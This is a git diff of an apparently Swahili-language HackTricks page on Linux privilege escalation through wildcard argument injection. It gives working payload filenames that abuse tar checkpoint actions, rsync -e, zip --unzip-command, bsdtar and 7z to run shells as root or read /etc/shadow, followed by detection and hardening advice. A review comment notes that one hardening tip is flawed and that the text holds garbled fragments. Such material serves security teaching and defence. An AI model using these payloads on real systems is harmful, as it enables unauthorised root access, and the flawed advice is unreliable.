diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index f7c7e6c8b..442af0c74 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md 
@@ -1,60 +1,123 @@ +# Wildcards Spare Tricks + {{#include ../../banners/hacktricks-training.md}} -## chown, chmod +> Wildcard (pia inajulikana kama *glob*) **kuingiza hoja** hutokea wakati skripti yenye mamlaka inapoendesha binary ya Unix kama `tar`, `chown`, `rsync`, `zip`, `7z`, … kwa kutumia wildcard isiyo na nukuu kama `*`. +> Kwa sababu shell inapanua wildcard **kabla** ya kutekeleza binary, mshambuliaji ambaye anaweza kuunda faili katika directory ya kazi anaweza kuunda majina ya faili yanayoanza na `-` ili yaweze kutafsiriwa kama **chaguzi badala ya data**, kwa ufanisi akisafirisha bendera za kiholela au hata amri. +> Ukurasa huu unakusanya primitives muhimu zaidi, utafiti wa hivi karibuni na ugunduzi wa kisasa kwa mwaka 2023-2025. -Unaweza **kuonyesha mmiliki wa faili na ruhusa unazotaka nakala kwa faili zingine** +## chown / chmod + +Unaweza **kunakili mmiliki/kikundi au bits za ruhusa za faili yoyote** kwa kutumia bendera `--reference`: ```bash -touch "--reference=/my/own/path/filename" +# attacker-controlled directory +touch "--reference=/root/secret``file" # ← filename becomes an argument ``` -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) - -## Tar - -**Teua amri za kiholela:** +Wakati root baadaye anatekeleza kitu kama: ```bash +chown -R alice:alice *.php +chmod -R 644 *.php +``` +`--reference=/root/secret``file` imeingizwa, ikisababisha *faili zote* zinazolingana kurithi umiliki/ruhusa za `/root/secret``file`. + +*PoC & chombo*: [`wildpwn`](https://github.com/localh0t/wildpwn) (shambulio lililounganishwa). +Tazama pia karatasi ya jadi ya DefenseCode kwa maelezo. 
+ +--- + +## tar + +### GNU tar (Linux, *BSD, busybox-full) + +Teua amri za kiholela kwa kutumia kipengele cha **checkpoint**: +```bash +# attacker-controlled directory +echo 'echo pwned > /tmp/pwn' > shell.sh +chmod +x shell.sh touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" ``` -Unaweza kutumia hii kwa kutumia [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(shambulio la tar)_\ -Maelezo zaidi katika [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Mara tu root anapokimbia e.g. `tar -czf /root/backup.tgz *`, `shell.sh` inatekelezwa kama root. -## Rsync +### bsdtar / macOS 14+ -**Tekeleza amri zisizo na mipaka:** +`tar` ya kawaida kwenye macOS za hivi karibuni (zinazoegemea `libarchive`) *haitekelezi* `--checkpoint`, lakini bado unaweza kufikia utekelezaji wa msimbo kwa kutumia bendera **--use-compress-program** ambayo inakuwezesha kubaini compressor ya nje. ```bash -Interesting rsync option from manual: - --e, --rsh=COMMAND specify the remote shell to use ---rsync-path=PROGRAM specify the rsync to run on remote machine +# macOS example +touch "--use-compress-program=/bin/sh" ``` +Wakati skripti yenye mamlaka inapoendesha `tar -cf backup.tar *`, `/bin/sh` itaanzishwa. 
+--- + +## rsync + +`rsync` inakuwezesha kubadilisha shell ya mbali au hata binary ya mbali kupitia bendera za amri zinazaanza na `-e` au `--rsync-path`: ```bash -touch "-e sh shell.sh" +# attacker-controlled directory +touch "-e sh shell.sh" # -e => use instead of ssh ``` -Unaweza kutumia hii kwa kutumia [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(\_rsync \_attack)_\ -Maelezo zaidi katika [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Ikiwa root baadaye anahifadhi saraka hiyo kwa `rsync -az * backup:/srv/`, bendera iliyoingizwa inazalisha shell yako upande wa mbali. -## 7z +*PoC*: [`wildpwn`](https://github.com/localh0t/wildpwn) (`rsync` mode). -Katika **7z** hata kutumia `--` kabla ya `*` (kumbuka kwamba `--` inamaanisha kwamba ingizo linalofuata haliwezi kut treated kama vigezo, hivyo ni njia za faili tu katika kesi hii) unaweza kusababisha kosa la kiholela kusoma faili, hivyo ikiwa amri kama ifuatayo inatekelezwa na root: +--- + +## 7-Zip / 7z / 7za + +Hata wakati skripti yenye mamlaka *inajihifadhi* kwa kuweka awali wildcard na `--` (kuzuia uchambuzi wa chaguo), muundo wa 7-Zip unasaidia **faili za orodha za faili** kwa kuweka awali jina la faili na `@`. 
Kuunganisha hiyo na symlink kunakuwezesha *kuhamasisha faili za kiholela*: ```bash -7za a /backup/$filename.zip -t7z -snl -p$pass -- * +# directory writable by low-priv user +cd /path/controlled +ln -s /etc/shadow root.txt # file we want to read +touch @root.txt # tells 7z to use root.txt as file list ``` -Na unaweza kuunda faili katika folda ambapo hii inatekelezwa, unaweza kuunda faili `@root.txt` na faili `root.txt` ikiwa ni **symlink** kwa faili unayotaka kusoma: +Ikiwa root anatekeleza kitu kama: ```bash -cd /path/to/7z/acting/folder -touch @root.txt -ln -s /file/you/want/to/read root.txt +7za a /backup/`date +%F`.7z -t7z -snl -- * ``` -Kisha, wakati **7z** inatekelezwa, itachukulia `root.txt` kama faili inayoshikilia orodha ya faili ambazo inapaswa kubana (hiyo ndiyo maana ya kuwepo kwa `@root.txt`) na wakati 7z inasoma `root.txt` itasoma `/file/you/want/to/read` na **kwa sababu maudhui ya faili hii si orodha ya faili, itatupa kosa** ikionyesha maudhui. +7-Zip itajaribu kusoma `root.txt` (→ `/etc/shadow`) kama orodha ya faili na itakataa, **ikiandika maudhui kwenye stderr**. -_Maelezo zaidi katika Write-ups ya sanduku la CTF kutoka HackTheBox._ +--- -## Zip +## zip -**Tekeleza amri zisizo na mipaka:** +`zip` inasaidia bendera `--unzip-command` ambayo inapitishwa *kama ilivyo* kwa shell ya mfumo wakati archive itajaribiwa: ```bash -zip name.zip files -T --unzip-command "sh -c whoami" +zip result.zip files -T --unzip-command "sh -c id" ``` +Inject the flag via a crafted filename and wait for the privileged backup script to call `zip -T` (test archive) on the resulting file. + +--- + +## Orodha ya ziada ya binaries zinazoweza kuathiriwa na wildcard injection (orodha ya haraka ya 2023-2025) + +Amri zifuatazo zimekuwa zikitumika vibaya katika CTFs za kisasa na mazingira halisi. 
Payload kila wakati huundwa kama *filename* ndani ya directory inayoweza kuandikwa ambayo baadaye itashughulikiwa kwa wildcard: + +| Binary | Flag to abuse | Effect | +| --- | --- | --- | +| `bsdtar` | `--newer-mtime=@` → arbitrary `@file` | Soma maudhui ya faili | +| `flock` | `-c ` | Tekeleza amri | +| `git` | `-c core.sshCommand=` | Utekelezaji wa amri kupitia git juu ya SSH | +| `scp` | `-S ` | Anzisha programu isiyo ya kawaida badala ya ssh | + +Hizi primitives ni za kawaida kidogo kuliko *tar/rsync/zip* classics lakini zina thamani ya kuangaliwa unapofanya uwindaji. + +--- + +## Ugunduzi & Uimarishaji + +1. **Zima shell globbing** katika scripts muhimu: `set -f` (`set -o noglob`) inazuia upanuzi wa wildcard. +2. **Nukuu au kimbia** hoja: `tar -czf "$dst" -- *` si *salama* — pendelea `find . -type f -print0 | xargs -0 tar -czf "$dst"`. +3. **Njia wazi**: Tumia `/var/www/html/*.log` badala ya `*` ili wahalifu wasiweze kuunda faili za ndugu zinazoh开始 na `-`. +4. **Haki ndogo**: Endesha kazi za backup/maintenance kama akaunti ya huduma isiyo na haki badala ya root inapowezekana. +5. **Ufuatiliaji**: Kanuni iliyojengwa awali ya Elastic *Potential Shell via Wildcard Injection* inatafuta `tar --checkpoint=*`, `rsync -e*`, au `zip --unzip-command` mara moja ikifuatwa na mchakato wa mtoto wa shell. Uchunguzi wa EQL unaweza kubadilishwa kwa EDR zingine. + +--- + +## Marejeleo + +* Elastic Security – Kanuni ya Potenshiali Shell kupitia Wildcard Injection Imegundulika (imepitiwa mara ya mwisho 2025) +* Rutger Flohil – “macOS — Tar wildcard injection” (Desemba 18 2024) + {{#include ../../banners/hacktricks-training.md}}
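Review bot: The hardening recommendation in item 2 of "Ugunduzi & Uimarishaji" replaces one problem with another: `find . -type f -print0 | xargs -0 tar -czf "$dst"` lets xargs split a large file list into several tar invocations, and each invocation recreates `$dst`, so only the last batch survives in the archive. Suggest having tar read the NUL-separated list directly, e.g. `find . -type f -print0 | tar --null -T - -czf "$dst"`, or prefixing the glob with a path (`tar -czf "$dst" ./*`) so that no expanded name can start with `-`; the `./` prefix is also the reason `find .` output is safe here, which is worth stating since it is the same fix as item 3. Two smaller points in the same hunk: the `chown`/`chmod` example uses the path `/root/secret``file`, where the doubled backticks look like a markdown-escaping artifact rather than an intended filename and should be a plain path, and item 3 of the hardening list contains a stray non-Swahili fragment ("zinazoh开始 na `-`") that should read as the Swahili word for "beginning with".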